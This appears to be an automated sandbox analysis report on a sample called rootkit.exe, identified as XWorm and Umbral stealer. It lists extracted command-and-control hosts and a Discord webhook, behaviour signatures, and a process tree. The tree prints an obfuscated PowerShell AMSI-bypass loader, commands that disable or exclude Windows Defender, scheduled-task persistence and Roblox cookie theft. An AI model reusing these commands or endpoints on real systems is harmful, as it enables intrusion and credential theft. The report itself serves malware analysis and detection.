Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-07-2024 17:43

General

  • Target

    rootkit.exe

  • Size

    274KB

  • MD5

    87119ce97d460721e8c6cb98f990c780

  • SHA1

    eac69d7550546b7812eb5701e82e079ff780d93a

  • SHA256

    f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

  • SHA512

    fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb

  • SSDEEP

    6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403

Mutex

25nhnSSJeo8OHnH7

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{247bfd2f-a347-44c7-8793-1b197dc51c69}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2656
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:720
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1044
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1128
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1152
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1204
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2892
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oaSExpkudVCx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vKDQJdzZhUHcxb,[Parameter(Position=1)][Type]$wpdQgvzinM)$FNlWDXhLNEf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'P'+'u'+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+'ns'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$FNlWDXhLNEf.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+'d');$FNlWDXhLNEf.DefineMethod('I'+'n'+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$wpdQgvzinM,$vKDQJdzZhUHcxb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'ti'+[Char](109)+''+[Char](101)+''+','+''+'M'+'an'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $FNlWDXhLNEf.CreateType();}$EeUsnCPsQHzJL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$WvdLDGOHBzEpPW=$EeUsnCPsQHzJL.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+''+'r'+''+[Char](111)+'c'+'A'+''+[Char](100)+'dr'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xjLuGNtkNKzFGQQbgRE=oaSExpkudVCx @([String])([IntPtr]);$OShaGrHhfzBAuveWJhpeov=oaSExpkudVCx @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KRYKBJIXbGa=$EeUsnCPsQHzJL.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$sqtVbxEkGcentu=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+'y'+'A'+'')));$UzKPgwQTtnHpPBbHl=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$KRYKBJIXbGa,[Object]('V'+'i'+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+'c'+'t')));$fWasPGS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sqtVbxEkGcentu,$xjLuGNtkNKzFGQQbgRE).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+'l'+'l');$JVdeMOyWmGqrvSAXn=$WvdLDGOHBzEpPW.Invoke($Null,@([Object]$fWasPGS,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+'B'+'u'+'ff'+'e'+''+[Char](114)+'')));$nmyhrEHocC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,4,[ref]$nmyhrEHocC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JVdeMOyWmGqrvSAXn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UzKPgwQTtnHpPBbHl,$OShaGrHhfzBAuveWJhpeov).Invoke($JVdeMOyWmGqrvSAXn,[uint32]8,0x20,[ref]$nmyhrEHocC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1912
                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                        C:\Users\Admin\AppData\Roaming\XClient.exe
                        2⤵
                        • Executes dropped EXE
                        PID:4900
                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                        C:\Users\Admin\AppData\Roaming\XClient.exe
                        2⤵
                        • Executes dropped EXE
                        PID:3180
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1304
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1372
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1412
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1440
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2664
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1592
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1600
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                    1⤵
                                      PID:1656
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1724
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1744
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1760
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1856
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2024
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:2028
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                  1⤵
                                                    PID:1380
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:316
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1788
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2160
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2260
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2352
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2520
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2532
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2680
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2740
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2764
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2820
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2848
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2868
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:3016
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3084
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3372
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:3488
                                                                                  • C:\Users\Admin\AppData\Local\Temp\rootkit.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4376
                                                                                    • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4056
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1812
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3996
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2728
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:3496
                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
                                                                                        4⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:508
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
                                                                                      3⤵
                                                                                      • Drops file in Drivers directory
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1980
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1300
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3808
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2372
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1400
                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        "wmic.exe" os get Caption
                                                                                        4⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5056
                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                        4⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5084
                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                        "wmic.exe" csproduct get uuid
                                                                                        4⤵
                                                                                          PID:1808
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1688
                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                          "wmic" path win32_VideoController get name
                                                                                          4⤵
                                                                                          • Detects videocard installed
                                                                                          PID:2104
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4724
                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
                                                                                        3⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:1248
                                                                                      • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                                                                        "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:3580
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3612
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3796
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3952
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4140
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                            1⤵
                                                                                              PID:5004
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1776
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:3532
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2884
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1944
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3324
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:1872
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:1700
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1464
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:2832
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:1460
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:2776
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                              1⤵
                                                                                                                PID:4220
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3676
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:2412

                                                                                                                  Network

                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                  Replay Monitor

